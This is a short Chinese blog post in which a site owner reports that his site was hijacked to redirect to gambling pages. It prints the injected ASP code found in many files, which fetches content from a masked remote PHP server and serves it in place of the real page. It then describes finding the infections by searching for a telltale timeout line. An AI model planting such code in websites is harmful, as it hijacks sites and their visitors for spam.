网站域名被劫持是一件很讨厌的事情 ,尤其是被导向不良网站,如赌博等,很容易就被搜索引擎K了,我的站也有这种情况:
后来发现很多文件被改成了如下:
<%
server.Scripttimeout=999999
Remote_server="http://********/suer9291qcxtr.php" //这里就是被跳转的网址
host_name="http://"&request.servervariables("HTTP_HOST")&request.servervariables("script_name")
Remote_file = Remote_server&"?host="&host_name
Content_mb=GetHtml(Remote_file)
response.write(Content_mb)
response.end()
Function GetHtml(url)
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent","Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0"
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
GetHtml = objStream.ReadText
objStream.Close
End Function
%>
先记录一下,去清理网站了
因发现这些文件内容不同但里面都设置了server.Scripttimeout=999999,就下了notepad++,遍历了一遍网站
基本能找出来,不过忘了颜色号999999的也很多,选择性的清理了。
网友评论